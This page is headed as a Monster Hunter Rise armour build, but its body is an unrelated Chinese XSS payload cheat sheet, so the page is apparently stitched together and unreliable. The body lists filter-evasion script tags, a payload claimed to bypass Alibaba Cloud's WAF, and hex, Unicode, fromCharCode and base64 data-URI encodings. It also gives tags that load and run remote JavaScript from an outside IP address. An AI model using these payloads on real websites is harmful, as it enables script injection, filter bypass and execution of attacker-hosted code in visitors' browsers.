《怪物獵人崛起》天慧套角龍斬斧龍氣配裝
阿新 • • 發佈:2021-07-04
一、XSS檢測標籤
<ScRipt>ALeRt("XSS");</sCRipT> <sc<script>ript>alert(/xss/)</script> <img src=""onerror="alert('xss')"> <img/src/onerror=alert(1)> <img/src='a'onerror=[1].find(alert)> <iframe onload=alert(1)> <marquee/onstart=confirm(1)> <details/open/ontoggle=top["al"+"ert"](1)> 谷歌瀏覽器 【繞阿里雲XSS】 <svg/onload=prompt(1)> <style onload=alert(1)> <body onload=prompt(1);> <details open ontoggle=alert(1)>
二、編碼轉換說明
1.js程式碼轉換為\u編碼 http://www.msxindl.com/tools/unicode16.asp 2.可以將ascii碼轉換為unicode http://www.msxindl.com/tools/unicode.asp 進而放入sublime將;去掉,把&#替換為,即可。這樣就可以使用String.fromCharCode()。 (ps:String.fromCharCode不宜過長) 3.data協議 PHNjcmlwdD5hbGVydCgnZGF0YSBwcm90b2NvbCcpPC9zY3JpcHQ+這裡Base64解碼後的結果 <script>alert('data protocol')</script> js檔案內容使用如下編碼: 1.JS+base16編碼 <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> 2.unicode編碼 <img src="1" onerror=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0075\u006e\u0069\u0063\u006f\u0 064\u0065\u0027\u0029")></img> 3.String.fromCharCode <IMG SRC=/ onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,10 1,39,41))"></img> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnZGF0YSBwcm90b2NvbCcpPC9zY3JpcHQ+"> </object>
三、遠端載入js原始碼
注意:有些網站只能載入https網站的js程式碼,有些只能載入http網站的js的程式碼
<svg onload="$.getScript`http://10.0.0.225/test2.js`" stype="display:none"> <script src=http://10.0.0.225/test2.js></script> <img src=x onerror=$.getScript('http://10.0.0.225/test2.js')> <details ontoggle="$.getScript`http://10.0.0.225/test2.js`">123</details>(詳細資訊) <script src="http://10.0.0.225/test2.js"></script>
四、XSS bypass參考文件
XSS Filter Evasion Cheat Sheet_最終版
一隻小the bug